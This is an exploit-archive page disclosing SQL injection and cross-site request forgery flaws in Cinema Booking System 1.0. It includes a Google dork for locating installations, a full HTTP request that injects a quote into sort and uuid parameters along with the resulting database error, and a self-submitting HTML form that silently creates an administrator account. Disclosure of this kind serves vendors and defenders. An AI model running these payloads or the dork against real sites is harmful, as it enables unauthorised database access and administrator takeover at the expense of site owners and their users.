exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery
Posted Jul 5, 2024
Authored by bRpsd

Cinema Booking System version 1.0 suffers from remote SQL injection and cross site request forgery vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
SHA-256 | 17d99c784f15844038509b9dcb7cc2e0afbcdebbac5e213e1d14c2427df6d660

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

Change Mirror Download
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities

.:. Google Dorks .:.
intitle:Cinema Booking System

.:. Date: July 5, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.phpjabbers.com/
.:. Product -> https://www.phpjabbers.com/cinema-booking-system/
.:. Product Version -> 1.0
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


#####################
|PRODUCT DESCRIPTION|
#####################
"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."






Vulnerability 1: Authenticated SQL Injection
GET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndex
Cookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952
Priority: u=1

Response:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESC
LIMIT 0, 10' at line 5




===========================================================================================
Vulnerability 2: Cross Site Request Forgery
Risk:Privilege Escalation

Proof of concept:
<h1>CSRF PoC</h1>
<form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">
<input type="hidden" name="user_create" value="1">
<input type="hidden" name="role_id" value="1">
<input type="hidden" name="email" value="test@test.com">
<input type="hidden" name="password" value="123123">
<input type="hidden" name="name" value="test">
<input type="hidden" name="phone" value="">
<input type="hidden" name="status" value="T">
</form>
<script type="text/javascript">
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close